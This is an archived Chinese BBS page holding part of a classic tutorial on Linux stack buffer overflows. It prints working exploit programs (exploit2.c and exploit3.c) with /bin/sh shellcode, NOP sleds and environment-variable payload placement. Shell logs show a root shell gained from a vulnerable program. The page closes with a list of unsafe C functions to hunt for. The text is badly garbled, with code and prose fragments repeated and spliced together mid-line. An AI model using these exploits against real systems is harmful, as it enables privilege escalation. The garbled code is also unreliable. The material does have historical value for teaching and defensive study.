📄 00000003.htm
字号:
*(addr_ptr++) = addr; <BR>for (i = 0; i < bsize/2; i++) <BR>buff[i] = NOP; <BR>ptr = buff + ((bsize/2) - (strlen(int i; <BR>if (argc > 1) bsize = atoi(argv[1]); <BR>if (argc > 2) offset = atoi(argv[2]); <BR>if (!(buff = malloc(bsize))) { <BR>printf("Can't allocate memory.\n"); <BR>exit(0); <BR>} <BR>addr = get_sp() - offset; <BR>printf("Using address: 0x%x\n", addr); <BR>ptr = buff; <BR>addr_ptr = (long *) ptr; <BR>for (i = 0; i < bsize; i+=4) <BR>*(addr_ptr++) = addr; <BR>for (i = 0; i < bsize/2; i++) <BR>buff[i] = NOP; <BR>ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); <BR>for (i = 0; i < strlen(shellcode); i++) <BR>*(ptr++) = shellcode[i]; <BR>buff[bsize - 1] = '\0'; <BR>memcpy(buff,"BUF=",4); <BR>putenv(buff); <BR>system("/bin/bash"); <BR>} <BR><--> end of exploit2.c <BR>[hosts]$ exploit2 600 <BR>Using address: 0xbffff6c3 <BR>[hosts]$ ./hole $BUF <BR>segmentation fault <BR>[hosts]$ exploit2 600 100 <BR>Using address: 0xbffffce6shellcode)/2)); <BR>for (i = 0; i < strlen(shellcode); i++) <BR>*(ptr++) = shellcode[i]; <BR>buff[bsize - 1] = '\0'; <BR>memcpy(buff,"BUF=",4); <BR>putenv(buff); <BR>system("/bin/bash"); <BR>} <BR><--> end of exploit2.c <BR>[hosts]$ exploit2 600 <BR>Using address: 0xbffff6c3 <BR>[hosts]$ ./hole $BUF <BR>segmentation fault <BR>[hosts]$ exploit2 600 100 <BR>Using address: 0xbffffce6 <BR>[hosts]$ ./hole $BUF <BR>#exit <BR>[hosts]$ <BR>为了更完善我们的代码, 我们把这些shellcode放到环境变量里去. 然后我们就 <BR>可以用这个变量的地址来溢出缓冲器了. 这方法可以增加我们的机会.用setenv()函 <BR>数来调用,并把shell[hosts]$ ./hole $BUF <BR>#exit <BR>[hosts]$ <BR>为了更完善我们的代码, 我们把这些shellcode放到环境变量里去. 然后我们就 <BR>可以用这个变量的地址来溢出缓冲器了. 这方法可以增加我们的机会.用setenv()函 <BR>数来调用,并把shellcode送到环境变量中去. <BR><++> buffer/exploit3.c <BR>#include <stdlib.h> <BR>#define DEFAULT_OFFSET 0 <BR>#define DEFAULT_BUFFER_SIZE 512 <BR>#define DEFAULT_EGG_SIZE 2048 <BR>[hosts]$ exploit2 600 100 <BR>Using address: 0xbffffce6 <BR>[hosts]$ ./hole $BUF <BR>#exit <BR>[hosts]$ <BR>为了更完善我们的代码, 我们把这些shellcode放到环境变量里去. 然后我们就 <BR>可以用这个变量的地址来溢出缓冲器了. 这方法可以增加我们的机会.用setenv()函 <BR>数来调用,并把shell[hosts]$ ./hole $BUF <BR>#exit <BR>[hosts]$ <BR>为了更完善我们的代码, 我们把这些shellcode放到环境变量里去. 然后我们就 <BR>可以用这个变量的地址来溢出缓冲器了. 这方法可以增加我们的机会.用setenv()函 <BR>数来调用,并把shellcode送到环境变量中去. <BR><++> buffer/exploit3.c <BR>#include <stdlib.h> <BR>#define DEFAULT_OFFSET 0 <BR>#define DEFAULT_BUFFER_SIZE 512 <BR>#define DEFAULT_EGG_SIZE 2048 <BR>#define NOP 0x90 <BR>char shellcode[] = <BR>"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" <BR>"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" <BR>"\x80\xe8\xdc\xff\xff\xff/bin/sh"; <BR>unsigned long get_esp(void) { <BR>__asm__("movl %esp,%eax"); <BR>} <BR>void main(int argc, char *argv[]) <BR>{ <BR>char *buff, *ptr, *egg; <BR>long *addr_ptr, addr; <BR>int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; <BR>int i, eggsize=DEFAULT_EGG_SIZE; <BR>if (argc > 1) bsize = atoi(argv[1]); <BR>if (argc > 2) offset = atoi(argv[2]); <BR>if (argc > 3) eggsize = atoi(argv[3]); <BR>if (!(buff = malloc(bsize))) { <BR>printf("Can't allocate memory.\n"); <BR>exit(0);code送到环境变量中去. <BR><++> buffer/exploit3.c <BR>#include <stdlib.h> <BR>#define DEFAULT_OFFSET 0 <BR>#define DEFAULT_BUFFER_SIZE 512 <BR>#define DEFAULT_EGG_SIZE 2048 <BR>#define NOP 0x90 <BR>char shellcode[] = <BR>"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" <BR>"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" <BR>"\x80\xe8\xdc\xff\xff\xff/bin/sh"; <BR>unsigned long get_esp(void) { <BR>__asm__("movl %esp,%eax"); <BR>} <BR>void main(int argc, char *argv[]) <BR>if (!(buff = malloc(bsize))) { <BR>printf("Can't allocate memory.\n"); <BR>exit(0);code送到环境变量中去. <BR><++> buffer/exploit3.c <BR>#include <stdlib.h> <BR>#define DEFAULT_OFFSET 0 <BR>#define DEFAULT_BUFFER_SIZE 512 <BR>#define DEFAULT_EGG_SIZE 2048 <BR>#define NOP 0x90 <BR>char shellcode[] = <BR>"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" <BR>"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" <BR>"\x80\xe8\xdc\xff\xff\xff/bin/sh"; <BR>unsigned long get_esp(void) { <BR>__asm__("movl %esp,%eax"); <BR>} <BR>void main(int argc, char *argv[]) <BR>{ <BR>char *buff, *ptr, *egg; <BR>long *addr_ptr, addr; <BR>int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; <BR>int i, eggsize=DEFAULT_EGG_SIZE; <BR>if (argc > 1) bsize = atoi(argv[1]); <BR>if (argc > 2) offset = atoi(argv[2]); <BR>if (argc > 3) eggsize = atoi(argv[3]); <BR>if (!(buff = malloc(bsize))) { <BR>printf("Can't allocate memory.\n"); <BR>exit(0); <BR>} <BR>if (!(egg = malloc(eggsize))) { <BR>printf("Can't allocate memory.\n"); <BR>exit(0); <BR>} <BR>addr = get_esp() - offset; <BR>printf("Using address: 0x%x\n", addr); <BR>ptr = buff; <BR>addr_ptr = (long *) ptr; <BR>for (i = 0; i} <BR>if (!(egg = malloc(eggsize))) { <BR>printf("Can't allocate memory.\n"); <BR>exit(0); <BR>} <BR>addr = get_esp() - offset; <BR>printf("Using address: 0x%x\n", addr); <BR>ptr = buff; <BR>addr_ptr = (long *) ptr; <BR>for (i = 0; i < bsize; i+=4) <BR>*(addr_ptr++) = addr; <BR>ptr = egg; <BR>for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) <BR>*(ptr++) = NOP; <BR>for (i = 0; i < strlen(shellcode); i++) <BR>*(ptr++) = shellcode[i]; <BR>buff[bsize - 1] = '\0'; <BR>egg[eggsize - 1] = '\0'; <BR>memcpy(egg,"BUF=",4); <BR>putenv(egg); <BR>memcpy(buff,"RET=",4); <BR>putenv(buff); <BR>system("/bin/bash"); <BR>} <BR>end of exploit3.c <BR>[hosts]$ exploit2 600 <BR>Using address: 0xbffff5d7 <BR>[hosts]$ ./hole $RET <BR>#exit <BR>[hosts]$ <BR>--------------------[ 寻找溢出 <BR>当然有能更准确找到缓冲溢出的方法, 那就是读它的源程序. 因为Linux是个开 <BR>放的系统, 你很容易就可以得到它的源程序. < bsize; i+=4) <BR>*(addr_ptr++) = addr; <BR>ptr = egg; <BR>for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) <BR>*(ptr++) = NOP; <BR>for (i = 0; i < strlen(shellcode); i++) <BR>*(ptr++) = shellcode[i]; <BR>buff[bsize - 1] = '\0'; <BR>egg[eggsize - 1] = '\0'; <BR>memcpy(egg,"BUF=",4); <BR>putenv(egg); <BR>memcpy(buff,"RET=",4); <BR>putenv(buff); <BR>system("/bin/bash"); <BR>} <BR>end of exploit3.c <BR>[hosts]$ exploit2 600 <BR>Using address: 0xbffff5d7 <BR>[hosts]$ ./hole $RET <BR>#exit <BR>[hosts]$ <BR>--------------------[ 寻找溢出 <BR>当然有能更准确找到缓冲溢出的方法, 那就是读它的源程序. 因为Linux是个开 <BR>放的系统, 你很容易就可以得到它的源程序. <BR>寻找没有边界校验的库函数调用,如: <BR>strcpy(), strcat(), sprintf(), vsprintf(), scanf(). <BR>其他的具有危险的函数如: <BR>在"当型"循环中的getc()和getchar(). <BR>strncat函数的错误使用。 <BR>--------------------[ 参考文献 <BR>Smashing the stack for fun and profit by aleph1 <BR>bufferoverflows by mudge <BR>**************************************************** <BR>by Lamagra access-<A HREF="mailto:granted@geocities.com>">granted@geocities.com></A> <BR>repaired by solo <<A HREF="mailto:soloist@188.net>">soloist@188.net></A> <BR>Copyright by isbase <A HREF="http://www.isbase.com/">http://www.isbase.com/</A> <BR>**************************************************** <BR>如要转载请保持文章的完整性 <BR>欢迎访问我们的站点<A HREF="http://www.isbase.com">http://www.isbase.com</A> <BR>绿色兵团给你安全的保证 <BR> <BR>-- <BR>※ 来源:·BBS 水木清华站 bbs.net.tsinghua.edu.cn·[FROM: 162.105.17.237] <BR><CENTER><H1>BBS水木清华站∶精华区</H1></CENTER></BODY></HTML>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -